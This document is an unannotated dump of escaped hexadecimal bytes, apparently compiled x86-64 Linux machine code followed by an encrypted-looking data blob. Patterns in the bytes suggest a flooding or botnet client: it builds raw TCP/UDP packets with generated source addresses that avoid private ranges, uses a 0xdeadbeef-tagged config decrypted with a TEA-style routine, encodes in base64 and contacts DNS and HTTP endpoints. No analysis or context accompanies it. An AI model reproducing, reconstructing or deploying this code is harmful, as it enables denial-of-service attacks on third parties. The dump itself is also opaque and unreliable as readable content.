24xd2x00x01x00x48x83xbcx24xc0x00x01x00x00x75x13xe8x28xf8xffxffxb9x00x02x00x00x48x99x48xf7xf9x44x8dx62x10xf6x84x24xa8x00x01x00x01x75x3bx48x8dxbcx24xa8x00x01x00xe8xc3xfaxffxffx85xc0x89xc3x0fx88xc4x02x00x00x48x8dxb4x24xd0x00x01x00xbax10x00x00x00x89xc7xe8x05xf8xffxffxffxc0x0fx84x7ex02x00x00x45x89xe6xe9x2cx02x00x00xe8xd0xf7xffxffx41x89xc6x44x8bx2dxc2x22x20x00x41x81xe6xfexffx00x00x41xffxc6xf6x84x24xa8x00x01x00x02x74x29xe8xadxf7xffxffx41x89xc5xc1xe8x18x3cx0ax74xf1x3cxdfx77xedx3cx7fx74xe9x44x89xe8xc1xe8x10x66x3dx10xacx74xddx66x3dxa8xc0x74xd7x8bx84x24xa8x00x01x00x45x89xf0x66x44x8bx8cx24xd2x00x01x00x44x8bxbcx24xd4x00x01x00x83xe0x04x83xf8x01x19xc0x31xd2x83xe0xf4x83xc0x14x48x98x4cx8dx74x04x3cx8bx84x24xc0x00x01x00x85xc0x74x39x89xc1x48x8bxb4x24xb8x00x01x00x4cx89xf7xf3xa4xebx3bx48x89x54x24x10x44x89x04x24x44x89x4cx24x08xe8x28xf7xffxffx48x8bx54x24x10x41x88x04x16x44x8bx4cx24x08x48xffxc2x44x8bx04x24x8bx84x24xc4x00x01x00x39xd0x77xcdx48x63xd2x41xc6x04x16x00xf6x84x24xa8x00x01x00x04x0fx84x94x00x00x00x8ax54x24x48x44x8dx70x14x83xc0x15x48x63xf0x48x8bx7cx24x18x66x44x89x44x24x3cx48x83xc6x0cx66x44x89x4cx24x3exc7x44x24x40x00x00x00x00x83xe2x0fx48xd1xeexc7x44x24x44x00x00x00x00x83xcax50x66xc7x44x24x4ax16xd0x66xc7x44x24x4cx00x00x88x54x24x48x8ax54x24x49x66xc7x44x24x4ex00x00x44x89x6cx24x30x44x89x7cx24x34xc6x44x24x38x00x83xe2xc0xc6x44x24x39x06x83xcax02x88x54x24x49x44x89xf2x66xc1xcax08x66x89x54x24x3axe8x3axf7xffxffx66x89x44x24x4cxb8x06x00x00x00xebx5dx44x8dx70x08x83xc0x09x48x8bx7cx24x18x48x63xf0x66x44x89x44x24x3cx66x44x89x4cx24x3ex48x83xc6x0cx44x89xf2x66xc7x44x24x42x00x00x48xd1xeex44x89x6cx24x30x44x89x7cx24x34x66xc1xcax08xc6x44x24x38x00x66x89x54x24x40xc6x44x24x39x11x66x89x54x24x3axe8xdbxf6xffxffx66x89x44x24x42xb8x11x00x00x00x41x83xc6x14x48x8dx7cx24x28x88x44x24x31x44x89xf6xc6x44x24x28x45xc6x44x24x29x00x66xc7x44x24x2cx01x00x66xc7x44x24x2ex00x00x44x89xf0xc6x44x24x30x40x66xc7x44x24x32x00x00x66xc1xc8x08x44x89x6cx24x34x44x89x7cx24x38x66x89x44x24x2axe8x82xf6xffxffx85xdbx66x89x44x24x32x78x77x4cx8dx84x24xd0x00x01x00x48x8dx74x24x28x31xc9x49x63xd6x41xb9x10x00x00x00x89xdfxe8xdaxf6xffxffx85xc0x7ex27xffxc5x83xfdx0ax7ex20x48x8dx3dx40x20x20x00xe8x83xf7xffxffx48x8dx3dx34x20x20x00x01x2dx66x20x20x00x31xedxe8x2fxf7xffxffxf6x84x24xa8x00x01x00x01x75x23x48x8dxb4x24x28x00x01x00xbax80x00x00x00x89xdfxe8x71xf6xffxffx48x85xc0x7fxe7x89xdfxe8xc5xf7xffxffx83xcbxffx8bxbcx24xccx00x01x00xe8x86xf5xffxffx83x3dx17x20x20x00x00x0fx85x9exfcxffxffx85xdbx78x07x89xdfxe8x9exf7xffxffx48x8dx3dxcfx1fx20x00xe8x12xf7xffxffx48x8dx3dxc3x1fx20x00xffx0dxe5x1fx20x00xe8xc0xf6xffxffx48x81xc4xe8x00x01x00x31xc0x5bx5dx41x5cx41x5dx41x5ex41x5fxc3x53x8bx0ex45x31xc0x8bx46x04x45x31xc9xebx5cx4dx89xc2x41x89xc3x89xc3x41x83xe2x03x41xc1xebx05xc1xe3x04x46x8bx14x92x41x31xdbx41xffxc1x41x01xc3x45x01xc2x41x81xe8x47x86xc8x61x45x31xdax44x01xd1x41x89xcax41x89xcbx41xc1xe3x04x41xc1xeax05x45x31xdax45x89xc3x41xc1xebx0bx41x01xcax41x83xe3x03x46x8bx1cx9ax45x01xc3x45x31xdax44x01xd0x41x39xf9x75x9fx89x0ex89x46x04x5bxc3x41x57x89xfax31xc0xb9x80x00x00x00x41x56x41x55x41x54x55x53x48x81xecx58x06x00x00x48x8dxacx24x10x04x00x00x48x89xefxf3xabx89x94x24x14x04x00x00xffxcaxc7x84x24x10x04x00x00xefxbexadxdex0fx85x92x00x00x00x48x8bx35x5ex1fx20x00x48x8dxacx24x1cx04x00x00x48x85xf6x74x1ax48x89xf7x48x83xc9xffxf2xaex48x89xefx48xf7xd1x48xffxc9x48x63xc9xf3xa4x48x89xfdx48x8bx35x00x1fx20x00xc6x45x00x2ax48xffxc5x48x85xf6x74x1cx48x89xf7x31xc0x48x83xc9xffxf2xaex48x89xefx48xf7xd1x48xffxc9x48x63xc9xf3xa4x48x89xfdx31xc0xc6x44x05x00x00x48xffxc0x48x83xf8x07x75xf2x48x8dx84x24x50x06x00x00xb9x08x00x00x00x48x29xc5x8dx85x42x02x00x00x99xf7xf9x8dx2cxc5x08x00x00x00xe9xa5x00x00x00x8bx05x7dx1ex20x00x48x83x3dx9dx1ex20x00x00xc7x84x24x20x04x00x00x00x00x00x00x89x84x24x18x04x00x00x8bx05xb9x1ex20x00x89x84x24x1cx04x00x00x74x5dx31xffxe8xfdxf4xffxffx89xc7x2bx3dx6dx1ex20x00x8bx35x4fx1ex20x00x74x0dx89xf0x31xd2xf7xf7x89x84x24x20x04x00x00x8bx8cx24x20x04x00x00x89xfax48x8dx3dx17x1dx20x00x31xc0xe8x19xf3xffxffx48x8dx3dxeax1dx20x00xe8x2dxf5xffxffx48x8dx3dxdex1dx20x00xc7x05x0cx1ex20x00x00x00x00x00xe8xd7xf4xffxffxe8x42xf3xffxffx85xc0xbdx20x00x00x00x0fx94xc0x0fxb6xc0x89x84x24x24x04x00x00x31xdbxebx23x89xd8x48x8dx15x99x0cx20x00xbfx0bx00x00x00xc1xf8x02x83xc3x08x48x98x48x8dxb4x84x10x04x00x00xe8xb7xf3xffxffx39xebx72xd9x44x8dx65x02xb9x03x00x00x00x31xffx44x89xe0x99xf7xf9x41x89xc4x46x8dx2cxa5x00x00x00x00x41x8dx75x01x48x63xf6xe8xfbxf3xffxffx48x85xc0x48x89xc3x0fx84xbbx00x00x00x48x8dx84x24x10x04x00x00x48x89xd9x31xf6x41xbax03x00x00x00xe9x92x00x00x00x8ax10x83xfdx03x45x89xd1x44x0fx4excdx48x8dx3dx7fx1cx20x00xc0xeax02x83xe2x3fx8ax14x17x88x11x0fxb6x10x44x8ax40x01x83xe2x03x41xc0xe8x04xc1xe2x04x45x0fxb6xc0x44x09xc2x41x83xf9x01x48x63xd2x8ax14x17x88x51x01xb2x3dx7ex1fx0fxb6x50x01x44x8ax40x02x41xc0xe8x06x83xe2x0fx45x0fxb6xc0xc1xe2x02x44x09xc2x48x63xd2x8ax14x17x41x83xf9x02x88x51x02xb2x3dx7ex11x0fxb6x50x02x48x8dx3dx16x1cx20x00x83xe2x3fx8ax14x17x88x51x03xffxc6x83xedx03x48x83xc0x03x48x83xc1x04x44x39xe6x0fx8cx65xffxffxffx4dx63xedx42xc6x04x2bx00x83x3dx05x1dx20x00x00x48x89xddx74x58x48x85xdbx48x89xd8x75x21xebx25x80xfax2bx75x05xc6x00x2dxebx12x80xfax2fx75x05xc6x00x5fxebx08x80xfax3dx75x03xc6x00x2cx48xffxc0x8ax10x84xd2x75xdbx4cx8bx05xbax1cx20x00x48x8bx15xbbx1cx20x00x48x8dx35x85x1bx20x00x48x8dx7cx24x10x48x8dx6cx24x10x48x89xd9x31xc0xe8x50xf3xffxffx48x8bx3dx91x1cx20x00x48x8dx8cx24x48x06x00x00x31xd2x31xf6x48xc7x84x24x48x06x00x00x00x00x00x00xe8x4cxf3xffxffx85xc0x0fx85x05x05x00x00x48x8bxbcx24x48x06x00x00x48x85xffx0fx84xf4x04x00x00x48x8bx47x18x48x85xc0x75x04x48x8bx47x20x48x8bx10x83x3dx10x1cx20x00x09x48x89x94x24x38x06x00x00x48x8bx40x08x66xc7x84x24x38x06x00x00x02x00x48x89x84x24x40x06x00x00x75x0ax66xc7x84x24x38x06x00x00x00x02x8bx05x28x1cx20x00x66xc1xc8x08x66x89x84x24x3ax06x00x00xe8x9bxf1xffxffx48x8dx94x24x10x06x00x00x31xc0xb9x0ax00x00x00x48x89xd7xf3xabx48x89xd7xc7x84x24x10x06x00x00x04x00x00x00xe8x74xf3xffxffx85xc0x41x89xc4x0fx88x6ax04x00x00x48x8dxb4x24x38x06x00x00xbax10x00x00x00x89xc7xe8xb5xf0xffxffxffxc0x0fx84x4ex04x00x00x48x89xeex44x89xe7xe8xfdxf4xffxffx48x85xc0x49x89xc5x0fx84x05x04x00x00x31xc0x48x83xc9xffx4cx89xefxf2xaex45x31xf6x48xf7xd1x48x8dx41xffx48x83xf8x09x0fx86x1ex04x00x00x48x83xc1x02x31xffx48xc1xe9x02x48x8dx0cx49x48x8dx71x01xe8xa0xf1xffxffx48x85xc0x48x89xc5x0fx84xcfx00x00x00x48x89xc2x4cx89xe9xe9xbcx00x00x00x48xffxc1x31xc0x41x80xf8x2ax76x2bx41x80xf8x7ax77x25x45x0fxb6xc0x48x8dx05x69x1ax20x00x41x83xe8x2bx4dx63xc0x42x8ax04x00x84xc0x74x0bx3cx24x74x05x83xe8x3dxebx02x31xc0x44x8ax01x45x84xc0x74x04x84xc0x74xbex84xc0x74x0bxffxc8xffxc6x88x84x3cx38x06x00x00x48xffxc7x48x83xffx04x75x06xebx09x31xffx31xf6x80x39x00x75xcfx85xf6x74x53x40x8axbcx24x39x06x00x00x44x0fxb6x84x24x38x06x00x00x48x63xf6x40x88xf8xc1xe7x04x41xc1xe0x02xc0xe8x04x44x09xc0x88x02x44x8ax8cx24x3ax06x00x00x44x88xc8xc0xe8x02x41x88xc0x44x88xc8x44x09xc7xc1xe0x06x40x88x7ax01x0ax84x24x3bx06x00x00x88x42x02x48x8dx54x32xffx80x39x00x75x9bxc6x02x00x48x89xe8xbax04x00x00x00x45x31xf6xebx35x48x89xc7x48x89x04x24x89x54x24x08xe8xf5xf4xffxffx45x85xf6x48x8bx04x24x8bx54x24x08x75x10x81x7dx00xefxbexadxdex0fx85xb3x02x00x00x8bx55x04x41x83xc6x02x48x83xc0x08x48x85xedx41x0fx95xc7x41x39xd6x7dx05x45x84xffx75xbax8bx45x08x83xf8x03x72x14x83xf8x04x76x17x83xf8x05x41xbex05x00x00x00x0fx84x76x02x00x00x45x31xf6xe9x6ex02x00x00x83x3dxdfx19x20x00x00x74x64x83xf8x03x74x0bx8bx45x0cx39x05x23x1ax20x00x74x54x48x8dx3dx96x19x20x00xe8xd9xf0xffxffx48x8dx3dx8ax19x20x00xc7x05xb0x19x20x00x00x00x00x00xe8x83xf0xffxffx45x31xf6xebx1ax48x8dx05xffx19x20x00x4ax8bx3cxf0x48x85xffx74x07x31xf6xe8x17xf1xffxffx49xffxc6x44x39x35xe5x39x20x00x7fxddxc7x05xcdx19x20x00x00x00x00x00x83x3dx72x19x20x00x00x41xbex05x00x00x00x0fx85xeex01x00x00x83x7dx08x04x0fx85xe4x01x00x00x8bx45x0cx4cx8dx75x2cx48x83xc9xffx4cx89xf7x89x05x9cx19x20x00x8bx45x10x89x05xafx39x20x00x8bx45x14x0fxc8x89x05xa8x39x20x00x8bx45x18x89xc2x66x89x05xa2x39x20x00x8bx45x1cxc1xeax10x66x89x15x93x39x20x00x89x05xa5x39x20x00x8bx45x20x89x05xa0x39x20x00x8bx45x24x89x05x8fx39x20x00x31xc0xf2xaex8bx45x28x48xc7x05x71x39x20x00x00x00x00x00x48xf7xd1x48xffxc9x89xcfx89x0dx6bx39x20x00x89x05x3dx39x20x00x85xffx0fx84xc0x00x00x00xe8x68xeexffxffx31xd2x48x85xc0x0fx45x15x4cx39x20x00x48x89x05x3dx39x20x00x89x15x3fx39x20x00x48x89xc2xe9x86x00x00x00x80xf9x5cx49x8dx76x01x75x75x41x8ax4ex01x48x89xf7x80xf9x72x74x1fx7fx0cx80xf9x5cx74x22x80xf9x6ex75x57xebx0cx80xf9x74x74x11x80xf9x78x75x4bxebx14xc6x02x0axebx41xc6x02x0dxebx3cxc6x02x09xebx37xc6x02x5cxebx32x41x8ax4ex02x49x8dx7ex03x8dx71xd0x83xe9x57x40x80xfex0ax0fx42xcexc1xe1x04x88x0ax41x8ax76x03x44x8dx46xd0x83xeex57x41x80xf8x0ax41x0fx42xf0x09xcex40x88x32x48xffxc2x4cx8dx77x01xebx08x88x0ax49x89xf6x48xffxc2x41x8ax0ex84xc9x0fx85x6fxffxffxffx48x29xc2x89x15x9dx38x20x00x83x3dx6ex38x20x00x00x79x0axc7x05x62x38x20x00x00x00x00x00x81x3dx58x38x20x00x00x04x00x00x7ex0axc7x05x4cx38x20x00x00x04x00x00x4cx8dx05x45x18x20x00x31xc0xb9x00x08x00x00x4cx89xc7xf3xabx48x8dx3dxa2x17x20x00x4cx89x44x24x08xe8xe0xeexffxffx48x8dx3dx91x17x20x00xc7x05xb7x17x20x00x01x00x00x00xe8x8axeexffxffx45x31xf6xebx21x4bx8dx3cxf0x48x8dx0dx12x38x20x00x48x8dx15xf4xf2xffxffx31xf6x49xffxc6x4cx89x44x24x08xe8xc4xecxffxffx44x39x35xe5x37x20x00x4cx8bx44x24x08x7fxd1x41xbex05x00x00x00x45x84xffx74x42x48x89xefxe8x13xefxffxffxebx38x45x31xf6x48x85xdbx74x08x48x89xdfxe8x01xefxffxffx45x85xe4x7ex08x44x89xe7xe8xe4xeexffxffx48x81xc4x58x06x00x00x44x89xf0x5bx5dx41x5cx41x5dx41x5ex41x5fxc3x41x83xccxffxebxc8x4cx89xefxe8xd1xeexffxffxebxc1x41x56xbex01x00x00x00xbfx0dx00x00x00x41x55x41x54x55x53x48x83xecx30xe8x34xedxffxffxbex01x00x00x00xbfx11x00x00x00xe8x25xedxffxffxbex01x00x00x00xbfx14x00x00x00xe8x16xedxffxffxbex01x00x00x00xbfx16x00x00x00xe8x07xedxffxffxbfx15x00x00x00xbex01x00x00x00xe8xf8xecxffxffxe8x43xedxffxffx31xffx85xc0x0fx85x93x00x00x00xe8xd4xecxffxffxe8x2fxeexffxffx48x8dx3dx12x16x20x00x31xdbxe8x61xebxffxffx89xdfxffxc3xe8x38xeexffxffx81xfbx00x04x00x00x75xefx66xbbx04x00x48x8dx3dx42x16x20x00x31xf6x31xc0xe8xdcxedxffxffxffxcbx75xecx44x0fxb6x25x38x05x20x00x48x8dx05x41x05x20x00x31xdbx41xbex01x00x00x00x31xedx49x01xc4x4dx89xe5x4cx89xefxe8x0exf1xffxffx85xedx75x12x41x81x7cx24x04xefxbexadxdex45x8bx34x24x75x13x4cx89xe3xffxc5x49x83xc5x08x44x39xf5x7cxd7x48x85xdbx75x0axbfx02x00x00x00xe8x61xedxffxffx8bx43x08x31xedx85xc0x74x06x48x63xe8x48x01xddx48x8bx3dx43x16x20x00x48x85xffx74x05xe8xb1xedxffxffx48x8bx3dx3ax16x20x00x48x85xffx74x05xe8xa0xedxffxffx81x7dx00x68x74x74x70x48x89x2dx1ax16x20x00xc7x05x20x16x20x00x00x00x00x00xc7x05x1ax16x20x00x50x00x00x00x75x57x48x8dx7dx07xc7x05x06x16x20x00x01x00x00x00xe8x49xecxffxffxbex2fx00x00x00x48x89xc7x48x89x05xe2x15x20x00xe8x15xedxffxffx48x85xc0x48x89xc5x75x15x48x8dx3dx00x15x20x00xe8x21xecxffxffx48x89x05xcax15x20x00xebx13x48x89xc7xe8x10xecxffxffxc6x45x00x00x48x89x05xb5x15x20x00x48x8bx3dxa6x15x20x00xbex3ax00x00x00xe8xd4xecxffxffx48x85xc0x48x89xc5x74x13x48x8dx78x01xe8xa3xecxffxffxc6x45x00x00x89x05x95x15x20x00x8bx43x0cx8bx53x10x89x05x6dx15x20x00x31xc0x85xd2x74x06x48x63xc2x48x01xd8x48x89x05x42x15x20x00xe8xf9xedxffxffx48x8bx3dx36x15x20x00x48x85xffx74x05xe8x64xebxffxffx83x3dx65x15x20x00x00x0fx85x85x00x00x00x31xd2xbex02x00x00x00xbfx02x00x00x00xe8xb6xeaxffxffx85xc0x89xc3x7ex6ex31xc0x83x3dxebx14x20x00x09x48x8dx74x24x0cxb9x04x00x00x00x48x89xf7xf3xabx66xc7x44x24x0cx02x00x75x07x66xc7x44x24x0cx00x02xbax10x00x00x00x89xdfxc7x44x24x10x08x08x08x08x66xc7x44x24x0ex00x35xe8xddxe9xffxffxffxc0x74x27x48x8dx54x24x2cx48x8dx74x24x1cx89xdfxc7x44x24x2cx10x00x00x00xe8x50xecxffxffxffxc0x74x0ax8bx44x24x20x89x05xdax14x20x00x8bx05xd4x14x20x00x48x8dx3dx3cx14x20x00x89x05x7bx14x20x00xe8xcaxe9xffxffx48x85xc0x48x89x05x80x14x20x00x74x13x48x8dx35x21x14x20x00x48x89xc7xe8x0fxebxffxffx85xc0x75x0ex48x8dx05x6ex13x20x00x48x89x05x5dx14x20x00x31xffxe8xe6xeaxffxffx89xc7xe8x2fxebxffxffx31xffxe8xd8xeaxffxffx48x63x15x51x14x20x00x48x89xc3x48x8bx05x3fx14x20x00x48x89xd9x48x29xc1x48x39xd1x7ex27x48x85xc0x75x11xbfx01x00x00x00xe8xa7xf4xffxffx83xf8x05x75x13xebx0axbfx02x00x00x00xe8x96xf4xffxffx48x89x1dx0dx14x20x00xbfx01x00x00x00xe8x8bxe9xffxffxebxaax00x0cx00x00x00x00x00x00x00x79x21x40x00x00x00x00x00x04x00x00x00x00x00x00x00xe8x00x40x00x00x00x00x00x05x00x00x00x00x00x00x00x38x07x40x00x00x00x00x00x06x00x00x00x00x00x00x00x58x02x40x00x00x00x00x00x0ax00x00x00x00x00x00x00x75x01x00x00x00x00x00x00x0bx00x00x00x00x00x00x00x18x00x00x00x00x00x00x00x03x00x00x00x00x00x00x00xc0x25x60x00x00x00x00x00x02x00x00x00x00x00x00x00x98x04x00x00x00x00x00x00x14x00x00x00x00x00x00x00x07x00x00x00x00x00x00x00x17x00x00x00x00x00x00x00xb0x08x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xc0x24x60x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x5ex0dx40x00x00x00x00x00x6ex0dx40x00x00x00x00x00x7ex0dx40x00x00x00x00x00x8ex0dx40x00x00x00x00x00x9ex0dx40x00x00x00x00x00xaex0dx40x00x00x00x00x00xbex0dx40x00x00x00x00x00xcex0dx40x00x00x00x00x00xdex0dx40x00x00x00x00x00xeex0dx40x00x00x00x00x00xfex0dx40x00x00x00x00x00x0ex0ex40x00x00x00x00x00x1ex0ex40x00x00x00x00x00x2ex0ex40x00x00x00x00x00x3ex0ex40x00x00x00x00x00x4ex0ex40x00x00x00x00x00x5ex0ex40x00x00x00x00x00x6ex0ex40x00x00x00x00x00x7ex0ex40x00x00x00x00x00x8ex0ex40x00x00x00x00x00x9ex0ex40x00x00x00x00x00xaex0ex40x00x00x00x00x00xbex0ex40x00x00x00x00x00xcex0ex40x00x00x00x00x00xdex0ex40x00x00x00x00x00xeex0ex40x00x00x00x00x00xfex0ex40x00x00x00x00x00x0ex0fx40x00x00x00x00x00x1ex0fx40x00x00x00x00x00x2ex0fx40x00x00x00x00x00x3ex0fx40x00x00x00x00x00x4ex0fx40x00x00x00x00x00x5ex0fx40x00x00x00x00x00x6ex0fx40x00x00x00x00x00x7ex0fx40x00x00x00x00x00x8ex0fx40x00x00x00x00x00x9ex0fx40x00x00x00x00x00xaex0fx40x00x00x00x00x00xbex0fx40x00x00x00x00x00xcex0fx40x00x00x00x00x00xdex0fx40x00x00x00x00x00xeex0fx40x00x00x00x00x00xfex0fx40x00x00x00x00x00x0ex10x40x00x00x00x00x00x1ex10x40x00x00x00x00x00x2ex10x40x00x00x00x00x00x3ex10x40x00x00x00x00x00x4ex10x40x00x00x00x00x00x5ex10x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20x00x00x00xacxaax9fx82xcfx5bxdex77xb7xf3x55xdax3bx4ax4axdfx2bx7dx4fxb5x0exbdxf7x4ex36xa1xe3xe7xcaxe5xc7x72x36xa1xe3xe7xcaxe5xc7x72xd5x50x44xcdxdex42xb1x07xaex64x9exd6x33xdex9bx07x34x2cxddx13xefx21xbaxfax51xd3x9ax76x5dxfbxa7x07x47x07x5cx19xb3x13x87xb4x8fxaex07x9cx1bx53x52x9ax67xc6x69x73x51xffx4axecx29xcdxbaxabxf2xfbxe3x46x7cxc2x54xf8x1bxe8xe7x8dx76x5ax2ex63x33x9fxc9x9ax66x32x0dxb7x31x58xa3x5ax25x5dx05x17x58xe9x5exd4xabxb2xcdxc6x9bxb4x54x11x0ex82x74x41x21x3dxdcx87x70xe9x3exa1x41xe1xfcx67x3ex01x7ex97xeaxdcx6bx96x8fx38x5cx2axecxb0x3bxfbx32xafx3cx54xecx18xdbx5cx02x1axfex43xfbxfaxaax3axfbx29xd1xe6x05x3cx7cx94x75xd8xbex61x89xf9x5cxbbxa8x99x0fx95xb1xebxf1xb3x05xefxf7x00xe9xa1x3axe5xcax0bxcbxd0x48x47x64xbdx1fx23x1exa8x1cx7bx64xc5x14x73x5axc5x5ex4bx79x63x3bx70x64x24x11x9ex09xdcxaaxd4xacxf2x1bx10xafx3bx33xcdxe3x50x48x47x15x5cxbbx6fx22x19xbax9bx7dxf5x0bxe1x1ax1cx7fx23xf8x29xf8xa4x1bx13xb5xcax4exe8x98x32x38xe0x79x4dx3dx34xbcx5fx4ex77xfaxcbx6cx05xacx86x21x2bxaax1ax55xa2xbex70xb5x73x3bx04x5cxd3x36x94xb3xafxe2xf0xe4x9ex4fx32x15x49xfdx82x4exa9x08x70xd4xb2x8ax29x54x48x9ax0axbcxd5x0ex18xa8x44xacx5bxf3x8ex4cxd7x2dx9bx09x42xe5x06xc4x33xafxcdxa3x84x7fx2dxadxd4x76x47xdex32x1cxecx4axc4x30xf6x20x23x85x6cxfbxb2x07x04xf4xecx0bxb9x20xbax86xc3x3ex05xf1xecxd9x67x33xb7x99x50xa3xe3x14xd3xd9x34xf7x5exa0xf2x10xa8xf6x05x94x01xbexb4xbcx44x78xfax49x69xe6x23xd0x1axdax69x6ax7ex4cx7ex51x25xb3x48x84x53x3ax94xfbx31x99x90x32x57x44xeex9bxbcxe9xe5x25xcfx08xf5xe9xe2x5ex53x60xaaxd2xb2xd0x85xfax54xd8x35xe8xd4x66x82x64x98xd9xa8x87x75x65x70x5ax8ax3fx62x80x29x44xdex7cxa5x89x4ex57x59xd3x51xadxacx86x95x80xecx17xe4x85xf1x8cx0cx66xf1x7cxc0x7cxbbx22xfcxe4x66xdax61x0bx63xafx62xbcx83xb4x69x2fx3axffxafx27x16x93xacx07x1fxb8x6dx11x34x2dx8dxefx4fx89xd4xb6x63x35xc1xc7xe4x24x83x67xd8xedx96x12xecx45x39x02xd8xe5x0axf8x9dx77x09xd1xa5x96xc1xf4x1fx95xaax82xcax6cx49xaex90xcdx16x68xbaxacx7axa6xf2xb4xa8xcax99xb2xc2x37x2axcbx08xcfx61xc9xc3x80x5ex6ex03x28xdax4cxd7x6ax19xedxd2xd3x99x4cx79x8bx00x22x56x9axd4x18xd1xfexe4xd9xcdx45xa3x91xc6x01xffxc9x2axd9x15x01x43x2fxeex15x02x87x61x7cx13x62x9ex69xfcx72x81xcdx71x65xa6x3exabx49xcfx71x4bxcex3ax75xa7x4fx76xeax7ex64xffx81xebx61xfdxfexc3x9bx67xbfx0dxe9x8cx7ex4ex32xbdxf9x7cx8cx6axc7x5bxa4x3cx02xf4xb2xedx72x16xecxf3x01x4dxf0x00x10x8bx67xcfx99x50x5bx17x9fx8exd4x98x0ax61x03xd1xbcxa7x0dxbex9bxbfxabx0exd5x98x01xd6xe5xf2xd6xf6x7dx3exc5x16x8ex21x2ex2dxafx02xc6xb9x63xc9x8ax1fx70x97xdex0cx56x89x1ax2bx21x1bx01x07x0dxd8xfdx8bx16xc2xa1xa4xe3xcfxd2x92xd2x98x4bx35x61xd5x55xd1x6cx33xddxc2xbcxf7xedxdex13xefxe5x20xc7xe2xabxddxa4x4dx81x88x1cx53x1axeexebx66x24x4cx3bx79x1exa8xacxfbx6ax68xf3x58x46x06x47x2bx26x0ex0dxd2xebxb2x1fx6cx3ax3bxc0x54x2axabxbax4exf8xf6xc7x16x9ex73x11x08xdbx04x60x22x0axa7x4dx31xb5x5bx03xa0x0dx22x0dx47x5dxcdx9bx87x78x56xd5x70x4cx9cx86xeax0fx98xf2xebx9cx53x0dxa7xfax5axd8xb0xb5xdbx50xc2xfdx5dx09x5ax2axa5xe2xa3xfbxb7x13x47x54x9ax31x63x32x23x4excex76x5bx75x71xb6x4dx21x6bx28x71x2ex25xcfx37x80xf9xdcx62x9cxd7x19xb0x1ex6dx4ax4fxd1x7cx73x1fx4axe9x7bxc0x5ax31x0dx7bx9cx36xedxcax5bxbcx02xdbxb5xdex3dx52xb6x57x02xd4xc4x4cx24x95xc8x97xb5x12x80x30xd2xdbx61xe0x56xfdx16x43xc8x71xffxcax4dxb5xa8x8ax07x5exe1x09x33xa6x55x57x3bx1dxeexf0x2fx6ex20x02x49x81xe2xa0x7fxf8xe3x47x69xe3x11xb6x98xb9x41x9fx18x22xa8x4bxc8xfdxa2x04x1ax90xf4x49xfex15x4bx48x96x2dxe8x15x25xcbx5cx8fxaex6dx45x46x27x86xe5x3fxa9x8dx8ax71x8ax2cx75xa4xbcx6axeexbax7fx39x02x15x67xeax2bx8cxb6x87x1bx64xf5x61xabx1cxe7x90x5bx90x1exe5x02xa8x11x77x4dxcdxe1x3bx87x60x74x8ax76xdbx74xa1x68x2ax28x83x8fx1dxe4x3ax39xccxcax94x5cxe8x79x5ex91x8axd6xdex57xb7x19xdfx18x8dx69x8ex69xddx2fxd1x08x57x54x97x75x39xd1xaex05x9bx43x61x84xbcxc0x15x47x96xf3x9ex4dx0cx7dx65x99xe6xf3x02xc4x22xd3xccx7ax28x63xefx61x34x9dx66xcfxe0xc7x53x9dx87x68xe4x1dx5bx82x6bx67x00xd0x01xe6xc4x03xaaxe6xd7x76x60xffxd9x4fx60x0dxedxc6xddxcdx8dx30x6ax15x99x4ex32xf4xd1x9dx5cxd1x6ex5dxb7x32x60x62x18x37xd8x79x36xb2xc8x96xbfxb5x5cx9cx83xeaxcdxedxffx66x3cx31x5ax0dxcfxb6xdex3dx13x95x6fx74xf7x87xabxd0x00xe2x82xc9x78x41x7exd5xdex01xbfxabxefxbex11x2bxefx6bx38xbex22x16xfbx35xabx6axa9xa3xf2x55x73xf2x37xf5xbbxafx36x3ax84x14x3bx43xbfx2ax01xd0x55xf1x3cx8dxafx5exa3xabx93x4fx15x3dxf2x07x92x65xfaxc9x5axb5x78x90xefxfdxa5x2bx40x64x55x42x35xabx33x71x38xe2xcfxdcx8dx62x2bxa3x9fx1dxaax31x82xa4xfaxdcx5ax73x6cx49x70x11x74xb0x76xcaxf2xabx75x25x1cxadx08xebx89x95x4dxb4x38xedxd1xe3x1ex53x87x19x2fxe1x8cx9cx2bxfcxadx9fxacx23x69x9fxcexdexc4xeax8cxccxd5x15x62x23xcax9ax10x9bx7dx2exefx05x47x1exe6xd3xbax11xcfx68xb1x7cx8bx1ax1bx5axf9xdfx44x85xacx1ax9ax0ex3dx64xa8x4dx00x26x7bxefx2bxc3x0dx11x96xc8x23x66x30xd4xe2xbbxeexfdx15xe7xdcx5ax6cx88x74x07x96xb1x6bx3fxfex6bx65x79x5ax90x3cx68xa1xd3x30xc4x39x60x98x1bx1bx87x18x31x6exf4x8bxdbx7dxffxe2x13xb0x4dx52xaexb9xb7x27x13x47x64x7bxe9x37xabxadx70x0bx46x8bx27xcdxa3x58x3bx97xe3x16x14xe2xf8x28x92x46x7ax40xffx32x67x12x79xcbx8ex62x02x39x10x72x45x56xfdx6cx23xa0xc4x5ex38xa7x75x4cx89x6dx74x1bxb3xefx5bxb2x21xc2xc5x9ax8ex53xfdx90x8cx0dx03xd1x63x00x3dx86xa1x01xe4xd9xa8x59x25x31xc7x9ax4cx7ax89xa7x2dxaax6axf2x44xf8x45x41x88xd1x4ex8bxa3xb1x8cxe0x37x2dxe2x1cx06x8ax75x2bxbcx3cxc5x08xb7x4exb0xe4xf8x1axd6x3dx12x1bx7ex9axecxcdx26x8fx7exb2x70xb6xdfx52xd2xe5xdcx47x10x98x84xd6xa1x3bx24x51x1fx1dx6bxf5x5ax7dx10xd8x17xfcxa5x3dx8cx24xefxfcxdaxcex4exacxb3x2axf3xc4xc3x77x9ax64xb2xbexb5xd1xdbx20xc6x35x9dxd6x0exb4xd3xb3xf2x5fxd7xe1x5bxb1xb0xa9x5dx63xd3x51x27x96xc8xc1xfax7bx80xafx4cx5bxcfx13x91x6cxe9x9fx21xbcx52x13x1bx2axf4x76xdbxa4x1fx39x08xf3x8ax2fx89x52xf1x84xcdx71x33x1axccx03x2dx5dx6fx16xfcx90xd3x4fxa3xeex79